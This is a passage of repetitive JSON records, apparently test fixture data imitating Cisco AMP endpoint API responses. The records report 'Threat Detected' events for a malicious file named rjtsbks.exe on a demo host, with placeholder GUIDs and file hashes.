Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":833000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196265","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":818000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196264","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196263","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":693000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":630000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196260","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":584000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":443000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196258","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196257","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 